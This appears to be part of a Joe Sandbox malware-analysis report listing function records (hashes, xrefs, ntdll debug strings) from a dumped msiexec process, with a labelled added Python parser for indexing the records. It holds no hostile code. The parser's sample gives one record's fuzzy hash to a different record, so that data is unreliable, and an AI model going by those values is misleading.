                                                                        • Instruction ID: 398315103d96d0164e8c42d73e7cfda739ded6a0f5c87c261fe049ae5ee8ce2f
                                                                        • Opcode Fuzzy Hash: 3a87eed6763f0e1237dde852d69db9a5b8a512296a4b7b720b902fcab9944f6f
                                                                        • Instruction Fuzzy Hash: DD41D0B1AD4710EFC720DBA4CD40F9B77E8AB48750F420A2ABE4897295E774DB00CB91
                                                                        Strings
                                                                        • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 22161B39
                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 22161B4A
                                                                        • LdrpAllocateTls, xrefs: 22161B40
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                        • API String ID: 0-4274184382
                                                                        • Opcode ID: ad550f9d42e7ff6dab7d5b048b1d90d63f7670624875147b117722f1563971a8
                                                                        • Instruction ID: 4293f14aafd9d910d7e9118bd7235136d8ad9d5cee40d8fe4c3d7b758a874188
                                                                        • Opcode Fuzzy Hash: ad550f9d42e7ff6dab7d5b048b1d90d63f7670624875147b117722f1563971a8
                                                                        • Instruction Fuzzy Hash: A3416975E80749AFDB15CFA8C981EAEBBF5FF98304F114619E805A7220D735AA00CB90
                                                                        Strings
                                                                        • PreferredUILanguages, xrefs: 221AC212
                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 221AC1C5
                                                                        • @, xrefs: 221AC1F1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                        • API String ID: 0-2968386058
                                                                        • Opcode ID: 67254abbd143b8a4c0d1c95607b275819a67ee120ce9257e9c7b625bf371ab34
                                                                        • Instruction ID: 7c928d51665498d75956776789b2174d61b2803a98a0a2d88d361336b3a2a91a
                                                                        • Opcode Fuzzy Hash: 67254abbd143b8a4c0d1c95607b275819a67ee120ce9257e9c7b625bf371ab34
                                                                        • Instruction Fuzzy Hash: BD416A76A80309AFDB11CBD4C9A1FEEB7B9AB14B14F10416BEA15F7280D7749B44CB90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                        • API String ID: 0-1373925480
                                                                        • Opcode ID: 955d080cfc18e6edcab409303a70b666630e89ee7cdfd14c0e88b809b876261e
                                                                        • Instruction ID: 80de4bc3707b0ce5b23d5678aaff34102fb9e2b8e3f633fde5518f850421a417
                                                                        • Opcode Fuzzy Hash: 955d080cfc18e6edcab409303a70b666630e89ee7cdfd14c0e88b809b876261e
                                                                        • Instruction Fuzzy Hash: 2741FD329887588FEB11CBA4D981FADBBB9EF65354F20055AD900AB391DA349B01CF12
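The function records above all follow one fixed layout (an optional Strings block of xrefs, then Memory Dump Source, Joe Sandbox IDA Plugin and Similarity fields). The parser below is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it turns that text layout into dictionaries so the Instruction Fuzzy Hash and String ID values can be pivoted on across reports, and it summarises per snapshot file which ntdll source paths (the minkernel\ntdll\*.c strings visible above) the dump references. The sample input is three records copied from this report with the "Download File" link text removed; the assumption that "$" is purely a field separator inside String ID (and never part of a string) is the author's, not the report's.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records into dicts.

Added example; not part of the Joe Sandbox report.  Assumes the record
layout seen in the report: a 'Strings' line starts each record, followed
by 'Memory Dump Source', 'Joe Sandbox IDA Plugin' and 'Similarity'
sections whose fields are '• Key: value' lines.  Assumes '$' only ever
separates strings inside 'String ID' (an assumption, not documented by
the report).
"""
import re
from collections import defaultdict

# Constructed sample: three records copied from the report above.
# Fields not shown here (Associated, Opcode ID, ...) parse the same way.
SAMPLE = r"""
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
• API String ID: 0-1391187441
• Instruction Fuzzy Hash: 5A31C036E40318AFD701CB44C884F9EB7F9EF45724F2040A2E919AB291DB70DA80DA60
Strings
• HEAP[%wZ]: , xrefs: 2214E6A6
• RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 2214E6C6
• HEAP: , xrefs: 2214E6B3
Memory Dump Source
• Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
• API String ID: 0-1340214556
• Instruction Fuzzy Hash: 53511835644784EFE312CB64CA98F9ABBF8FF05304F1401A5E5998B692DB74EB40DB50
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 221682E8
• Failed to reallocate the system dirs string !, xrefs: 221682D7
• LdrpInitializePerUserWindowsDirectory, xrefs: 221682DE
Memory Dump Source
• Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
Similarity
• API ID:
• String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
• API String ID: 0-1783798831
• Instruction Fuzzy Hash: DD41D0B1AD4710EFC720DBA4CD40F9B77E8AB48750F420A2ABE4897295E774DB00CB91
"""

RECORD_START = "Strings"
SECTION_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
BULLET = "• "
XREF_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<addr>[0-9A-Fa-f]+)$")
NTDLL_SRC_RE = re.compile(r"minkernel\\[\w\\]+\.c")


def _norm(key):
    return key.strip().lower().replace(" ", "_")


def parse_records(text):
    """Return one dict per function record, in report order."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == RECORD_START:                  # a new record begins
            rec = {"xref_strings": [], "string_ids": []}
            records.append(rec)
            section = RECORD_START
            continue
        if rec is None:                           # text before the first record
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if not line.startswith(BULLET):
            continue
        body = line[len(BULLET):]
        if section == RECORD_START:               # "<string>, xrefs: <hex addr>"
            m = XREF_RE.match(body)
            if m:
                rec["xref_strings"].append((m.group("text"), int(m.group("addr"), 16)))
            continue
        key, _, value = body.partition(":")
        key, value = _norm(key), value.strip()
        if key == "source_file":                  # "<file>, Offset: X, based on PE: true"
            parts = [p.strip() for p in value.split(",")]
            rec["source_file"] = parts[0]
            for p in parts[1:]:
                k, _, v = p.partition(":")
                rec[_norm(k)] = v.strip()
        elif key == "associated":
            rec.setdefault("associated", []).append(value)
        elif key == "string_id":                  # '$'-separated (assumed separator)
            rec["string_ids"] = [s for s in value.split("$") if s]
        else:
            rec[key] = value
    return records


def index_by_fuzzy_hash(records):
    """Map Instruction Fuzzy Hash -> records, for pivoting across reports."""
    idx = defaultdict(list)
    for r in records:
        if r.get("instruction_fuzzy_hash"):
            idx[r["instruction_fuzzy_hash"]].append(r)
    return dict(idx)


def summarize(records):
    """Per snapshot file: function count, distinct fuzzy hashes, ntdll source paths seen."""
    out = {}
    for r in records:
        s = out.setdefault(r.get("snapshot_file", "?"),
                           {"functions": 0, "fuzzy_hashes": set(), "ntdll_sources": set()})
        s["functions"] += 1
        if r.get("instruction_fuzzy_hash"):
            s["fuzzy_hashes"].add(r["instruction_fuzzy_hash"])
        for text in r["string_ids"] + [t for t, _ in r["xref_strings"]]:
            s["ntdll_sources"].update(NTDLL_SRC_RE.findall(text))
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for snap, s in summarize(recs).items():
        print(snap, s["functions"], "functions;", "ntdll sources:", sorted(s["ntdll_sources"]))
```

Feeding a whole report's function listing through `parse_records` and joining `index_by_fuzzy_hash` output across several reports is the practical use: an Instruction Fuzzy Hash that recurs in dumps from unrelated samples, together with ntdll debug strings like the ones above, is OS code that was copied or mapped into the process rather than payload logic, and can be dropped from the set of functions worth reversing.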
                                                                        Strings
                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 22174888
                                                                        • LdrpCheckRedirection, xrefs: 2217488F
                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 22174899
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                        • API String ID: 0-3154609507
                                                                        Strings
                                                                        • RtlCreateActivationContext, xrefs: 221629F9
                                                                        • Actx , xrefs: 221233AC
                                                                        • SXS: %s() passed the empty activation context data, xrefs: 221629FE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                        • API String ID: 0-859632880
                                                                        Strings
                                                                        • minkernel\ntdll\ldrtls.c, xrefs: 22161A51
                                                                        • DLL "%wZ" has TLS information at %p, xrefs: 22161A40
                                                                        • LdrpInitializeTls, xrefs: 22161A47
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                        • API String ID: 0-931879808
                                                                        Strings
                                                                        • @, xrefs: 221312A5
                                                                        • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 2213127B
                                                                        • BuildLabEx, xrefs: 2213130F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                        • API String ID: 0-3051831665
                                                                        Strings
                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 22172104
                                                                        • LdrpInitializationFailure, xrefs: 221720FA
                                                                        • Process initialization failed with status 0x%08lx, xrefs: 221720F3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2986994758
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: #%u
                                                                        • API String ID: 48624451-232158463
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@
                                                                        • API String ID: 0-149943524
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `$`
                                                                        • API String ID: 0-197956300
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Legacy$UEFI
                                                                        • API String ID: 0-634100481
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$$
                                                                        • API String ID: 0-233714265
                                                                        Strings
                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 220FA309
                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 220FA2FB
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                        • API String ID: 0-2876891731
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .Local\$@
                                                                        • API String ID: 0-380025441
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: GlobalTags
                                                                        • API String ID: 0-1106856819
                                                                        • Opcode ID: 58b2f62480995ced039b2383a0404e9d5f1a31be459e4fd886e235905c6e03c4
                                                                        • Instruction ID: d76e00b7354984b7698a2b1d5892fb1bc9e0a03982dd1ce340c19bdef271b778
                                                                        • Opcode Fuzzy Hash: 58b2f62480995ced039b2383a0404e9d5f1a31be459e4fd886e235905c6e03c4
                                                                        • Instruction Fuzzy Hash: 91717C75E4035ADFDB18CFA8C690EFDBBB1BF58704F10812AE905A7245EB399A11CB50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                        • Instruction ID: b6f1c2c01dcf8371b2496916ab50c797b53f064e3836e6dda7c54eea63f7f403
                                                                        • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                        • Instruction Fuzzy Hash: 4C615872D8135DAFDB259FA5C940FDEBBB4FF84714F10426AE920A7290DB748A01DB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @
                                                                        • API String ID: 0-2766056989
                                                                        • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                        • Instruction ID: 858ea9407f8c5236d313cd8a588f796fc9a40ffe81d0d3e13842552f64e6eb90
                                                                        • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                        • Instruction Fuzzy Hash: 8F51AC72584745AFD7128F14C940FABB7F8FB84754F000929BA809B290DBB4EE04CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: EXT-
                                                                        • API String ID: 0-1948896318
                                                                        • Opcode ID: 45f6c9b2713cc3ecc9b660b38c4cad774670df2a590f3204a2f8864602d562c5
                                                                        • Instruction ID: a8ad1a319fce956a6373f0a09f2fddf192c7abc12b4e2a6a1ad84d3a451fc92c
                                                                        • Opcode Fuzzy Hash: 45f6c9b2713cc3ecc9b660b38c4cad774670df2a590f3204a2f8864602d562c5
                                                                        • Instruction Fuzzy Hash: 7E418F725983019FD710CB66C980F9BB7D8AF88718F000A29FE84E7240EA34DB04C792
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: PreferredUILanguages
                                                                        • API String ID: 0-1884656846
                                                                        • Opcode ID: 7429848f42aeba94d2ef6c62435a753229426e3e24d01a120df279071d51a669
                                                                        • Instruction ID: af499ec6c0abfc93ef61574d5342d7a06eb9e8a043e6174fbfebab68fbab3031
                                                                        • Opcode Fuzzy Hash: 7429848f42aeba94d2ef6c62435a753229426e3e24d01a120df279071d51a669
                                                                        • Instruction Fuzzy Hash: 0D41CF7A940399ABCB12CE94C960FEFB7B9EF64754F010266EA11EB250D634DF40C7A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: BinaryHash
                                                                        • API String ID: 0-2202222882
                                                                        • Opcode ID: f2c78d886104fbf170246405893b0908d009988cd15a25712ce512f696ec65ec
                                                                        • Instruction ID: 559cad43a9aeceaa53245c813dbe41a3da45d6e6d2ec9e79abe459f9c0e8e4b9
                                                                        • Opcode Fuzzy Hash: f2c78d886104fbf170246405893b0908d009988cd15a25712ce512f696ec65ec
                                                                        • Instruction Fuzzy Hash: CC4173B1D4132CAEDB61CB60CD84FEEB77DAB54714F0045E5AA08AB140DB709F988FA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: kLsE
                                                                        • API String ID: 0-3058123920
                                                                        • Opcode ID: 7b9ed681c2b71c8f65f69ad5f9dbfc5105b8bb42ac50d6678bcbdf5f5a939cc3
                                                                        • Instruction ID: ae79ce03513f1e417aeee593d290da63963dcf229c9ea69440ba67b68140d036
                                                                        • Opcode Fuzzy Hash: 7b9ed681c2b71c8f65f69ad5f9dbfc5105b8bb42ac50d6678bcbdf5f5a939cc3
                                                                        • Instruction Fuzzy Hash: 724128B16C13818BE7119FA0CD81FEB3BE0BF51768F540D69ED504A0CACB785A82C790
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Flst
                                                                        • API String ID: 0-2374792617
                                                                        • Opcode ID: aa42521a1af05ea37ca319d52864ba457a12f83525a64ae393ed9c7f7243f105
                                                                        • Instruction ID: a6956cedc8f0fcf52e219b5190f78d055aad15bc967b0b67e6b259167afb4e79
                                                                        • Opcode Fuzzy Hash: aa42521a1af05ea37ca319d52864ba457a12f83525a64ae393ed9c7f7243f105
                                                                        • Instruction Fuzzy Hash: 9D41A9B16457129FC708CF28C580E6AFBE4EB49714F11826EE9588F241DB71DA42CBA1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Actx
                                                                        • API String ID: 0-89312691
                                                                        • Opcode ID: 4360ee6331618bbb7a3214b318f302f6931a944e8e045f13516a7dddd214f2b0
                                                                        • Instruction ID: 95b0a64c300e17fc24f967a2144bf4e3c2054d2ed7454845f359e5aea4df0de0
                                                                        • Opcode Fuzzy Hash: 4360ee6331618bbb7a3214b318f302f6931a944e8e045f13516a7dddd214f2b0
                                                                        • Instruction Fuzzy Hash: 2F1193303C57028BD7354A198951B5E7FD5FB95368F30863AE5A1CBB91DE71E841E380
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221E9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.00000000221ED000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000A.00000002.3185756422.000000002225E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_10_2_220c0000_msiexec.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LdrCreateEnclave
                                                                        • API String ID: 0-3262589265
                                                                        • Opcode ID: cedf101bba2f2ccfabe0a3d759abc7ea4922868891886cca14e534ded5adf7c3
                                                                        • Instruction ID: 0954527d6a1a11403edee98c89ef34d88ec8a4a3ba9748e0e4ebcb59f2955a55
                                                                        • Opcode Fuzzy Hash: cedf101bba2f2ccfabe0a3d759abc7ea4922868891886cca14e534ded5adf7c3
                                                                        • Instruction Fuzzy Hash: 282137B15483449FC310CF2AC945A5BFBF8FBD5710F400A1EB9949B264D7B09604CB92
                                                                        Memory Dump Source
                                                                        • Source File: 0000000A.00000002.3185756422.00000000220C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 220C0000, based on PE: true
